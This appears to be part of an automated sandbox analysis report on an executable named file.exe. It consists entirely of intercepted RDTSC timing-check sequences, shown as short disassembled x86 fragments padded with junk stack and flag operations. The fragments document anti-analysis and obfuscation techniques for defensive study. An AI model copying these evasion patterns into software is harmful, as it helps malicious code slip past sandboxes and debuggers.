                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE34D6 second address: AE34F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F6849049226h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE34F8 second address: AE34FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE377B second address: AE3795 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3795 second address: AE3799 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE3799 second address: AE379F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE536C second address: AE5395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 jmp 00007F684908B765h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jg 00007F684908B756h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE5395 second address: AE539B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE539B second address: AE53A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007F684908B756h 0x0000000d rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4E6E second address: AE4E82 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6849049226h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F6849049226h 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4E82 second address: AE4EA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B75Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d jmp 00007F684908B75Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4EA3 second address: AE4EA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE4EA8 second address: AE4EC0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F684908B763h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6E60 second address: AE6E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6E64 second address: AE6E76 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F684908B756h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F684908B762h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6E76 second address: AE6E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F6849049226h 0x0000000a rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AE6E80 second address: AE6E85 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0DAC second address: 4EE0DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0DB0 second address: 4EE0DCD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0DCD second address: 4EE0DDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F684904922Ch 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0DDD second address: 4EE0DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0CDF second address: 4ED0D61 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6849049239h 0x00000008 sbb al, 00000046h 0x0000000b jmp 00007F6849049231h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 call 00007F6849049230h 0x00000018 call 00007F6849049232h 0x0000001d pop esi 0x0000001e pop edx 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 jmp 00007F684904922Eh 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F6849049237h 0x0000002f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20158 second address: 4F2015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2015C second address: 4F20162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20162 second address: 4F201A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B764h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cl, B4h 0x0000000d mov dh, D7h 0x0000000f popad 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F684908B75Eh 0x00000019 call 00007F684908B762h 0x0000001e pop esi 0x0000001f popad 0x00000020 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F201A7 second address: 4F201FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F684904922Eh 0x00000008 mov edx, esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007F6849049239h 0x00000016 pushfd 0x00000017 jmp 00007F6849049230h 0x0000001c and cx, 0658h 0x00000021 jmp 00007F684904922Bh 0x00000026 popfd 0x00000027 popad 0x00000028 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F201FD second address: 4F20251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d mov esi, edx 0x0000000f popad 0x00000010 mov di, 97E8h 0x00000014 popad 0x00000015 pop ebp 0x00000016 pushad 0x00000017 movsx edx, si 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007F684908B764h 0x00000022 sbb al, 00000048h 0x00000025 jmp 00007F684908B75Bh 0x0000002a popfd 0x0000002b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB00EE second address: 4EB00F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB00F3 second address: 4EB00F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB00F9 second address: 4EB0175 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 mov edi, 5292862Eh 0x0000000e pushfd 0x0000000f jmp 00007F684904922Fh 0x00000014 sbb eax, 2342D6DEh 0x0000001a jmp 00007F6849049239h 0x0000001f popfd 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 jmp 00007F684904922Eh 0x00000027 mov ebp, esp 0x00000029 jmp 00007F6849049230h 0x0000002e push dword ptr [ebp+04h] 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F6849049237h 0x00000038 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EB0175 second address: 4EB018D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F684908B764h 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0A13 second address: 4ED0A50 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F684904922Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F684904922Eh 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0A50 second address: 4ED0A56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0A56 second address: 4ED0A91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F6849049239h 0x0000000e mov ebp, esp 0x00000010 jmp 00007F684904922Eh 0x00000015 pop ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dl, DFh 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED05D2 second address: 4ED05D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED05D6 second address: 4ED05DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED05DC second address: 4ED063B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F684908B762h 0x00000008 pushfd 0x00000009 jmp 00007F684908B762h 0x0000000e add cx, 3618h 0x00000013 jmp 00007F684908B75Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F684908B75Eh 0x00000026 or cl, 00000078h 0x00000029 jmp 00007F684908B75Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED063B second address: 4ED0668 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049239h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F684904922Dh 0x00000011 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0668 second address: 4ED066E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0526 second address: 4ED052A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED052A second address: 4ED0538 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B75Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0538 second address: 4ED0567 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 79h 0x00000005 mov ebx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c jmp 00007F6849049234h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F684904922Ah 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED0567 second address: 4ED056D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED02D1 second address: 4ED02E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED02E0 second address: 4ED02E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4ED02E6 second address: 4ED02EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE00C3 second address: 4EE00F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, C1B0h 0x00000007 mov edi, 44A948DCh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov al, ACh 0x00000015 jmp 00007F684908B769h 0x0000001a popad 0x0000001b rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20013 second address: 4F20019 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20019 second address: 4F2001D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2001D second address: 4F20021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20021 second address: 4F2005D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F684908B75Bh 0x00000012 xor cx, 2BEEh 0x00000017 jmp 00007F684908B769h 0x0000001c popfd 0x0000001d mov ax, 7377h 0x00000021 popad 0x00000022 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F2005D second address: 4F200B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F684904922Dh 0x00000012 or ax, E2D6h 0x00000017 jmp 00007F6849049231h 0x0000001c popfd 0x0000001d mov ch, E6h 0x0000001f popad 0x00000020 mov eax, edi 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 pushad 0x00000025 mov cx, dx 0x00000028 call 00007F6849049231h 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F200B4 second address: 4F200ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F684908B766h 0x00000011 jmp 00007F684908B765h 0x00000016 popfd 0x00000017 popad 0x00000018 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F200ED second address: 4F200F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F200F3 second address: 4F200F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F200F7 second address: 4F20111 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F684904922Dh 0x00000012 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F20111 second address: 4F20126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF023C second address: 4EF0242 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0242 second address: 4EF0246 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0246 second address: 4EF024A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF024A second address: 4EF028A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F684908B769h 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F684908B768h 0x00000019 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF028A second address: 4EF0299 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0299 second address: 4EF02C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F684908B75Dh 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF02C8 second address: 4EF0302 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6849049237h 0x00000009 adc ah, 0000001Eh 0x0000000c jmp 00007F6849049239h 0x00000011 popfd 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0302 second address: 4EF0328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 and dword ptr [eax], 00000000h 0x0000000a pushad 0x0000000b mov dx, F82Ch 0x0000000f popad 0x00000010 and dword ptr [eax+04h], 00000000h 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 jmp 00007F684908B75Ch 0x0000001c mov ebx, eax 0x0000001e popad 0x0000001f rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0328 second address: 4EF0369 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049237h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F6849049232h 0x00000013 and ch, FFFFFFD8h 0x00000016 jmp 00007F684904922Bh 0x0000001b popfd 0x0000001c rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0C7E second address: 4EE0C9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0C9B second address: 4EE0CA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0CA1 second address: 4EE0CA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EE0CA5 second address: 4EE0CD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6849049233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6849049235h 0x00000013 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF001F second address: 4EF0077 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B760h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F684908B75Eh 0x00000010 pushfd 0x00000011 jmp 00007F684908B762h 0x00000016 jmp 00007F684908B765h 0x0000001b popfd 0x0000001c popad 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 push eax 0x00000022 pop ebx 0x00000023 mov dx, cx 0x00000026 popad 0x00000027 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0077 second address: 4EF00D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6849049231h 0x00000008 mov edx, eax 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F684904922Fh 0x00000017 sbb eax, 084EBC7Eh 0x0000001d jmp 00007F6849049239h 0x00000022 popfd 0x00000023 jmp 00007F6849049230h 0x00000028 popad 0x00000029 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF00D5 second address: 4EF0103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F684908B766h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EF0103 second address: 4EF0109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F10810 second address: 4F108AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 test eax, eax 0x00000007 jmp 00007F684908B767h 0x0000000c je 00007F68BB0AE88Eh 0x00000012 jmp 00007F684908B766h 0x00000017 mov ecx, eax 0x00000019 pushad 0x0000001a mov edx, esi 0x0000001c pushfd 0x0000001d jmp 00007F684908B75Ah 0x00000022 sbb eax, 22EA3318h 0x00000028 jmp 00007F684908B75Bh 0x0000002d popfd 0x0000002e popad 0x0000002f xor eax, dword ptr [ebp+08h] 0x00000032 pushad 0x00000033 mov edx, 3F5C9248h 0x00000038 pushad 0x00000039 movsx ebx, cx 0x0000003c pushfd 0x0000003d jmp 00007F684908B768h 0x00000042 add ah, FFFFFFA8h 0x00000045 jmp 00007F684908B75Bh 0x0000004a popfd 0x0000004b popad 0x0000004c popad 0x0000004d and ecx, 1Fh 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 pop ebx 0x00000055 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F108AC second address: 4F1091F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684904922Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, 20E65EA1h 0x0000000e popad 0x0000000f ror eax, cl 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 leave 0x00000017 jmp 00007F684904922Bh 0x0000001c retn 0004h 0x0000001f nop 0x00000020 mov esi, eax 0x00000022 lea eax, dword ptr [ebp-08h] 0x00000025 xor esi, dword ptr [00842014h] 0x0000002b push eax 0x0000002c push eax 0x0000002d push eax 0x0000002e lea eax, dword ptr [ebp-10h] 0x00000031 push eax 0x00000032 call 00007F684D759A40h 0x00000037 push FFFFFFFEh 0x00000039 jmp 00007F6849049236h 0x0000003e pop eax 0x0000003f jmp 00007F6849049230h 0x00000044 ret 0x00000045 nop 0x00000046 push eax 0x00000047 call 00007F684D759A63h 0x0000004c mov edi, edi 0x0000004e push eax 0x0000004f push edx 0x00000050 jmp 00007F6849049237h 0x00000055 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F1091F second address: 4F109AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F684908B75Ch 0x00000010 push eax 0x00000011 pop edx 0x00000012 pop ecx 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop edi 0x00000016 pop ecx 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F684908B762h 0x00000020 add esi, 5B42D2E8h 0x00000026 jmp 00007F684908B75Bh 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007F684908B768h 0x00000032 or esi, 7701E548h 0x00000038 jmp 00007F684908B75Bh 0x0000003d popfd 0x0000003e popad 0x0000003f xchg eax, ebp 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F109AC second address: 4F109B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4F109B0 second address: 4F109CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F684908B767h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EC002C second address: 4EC0031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
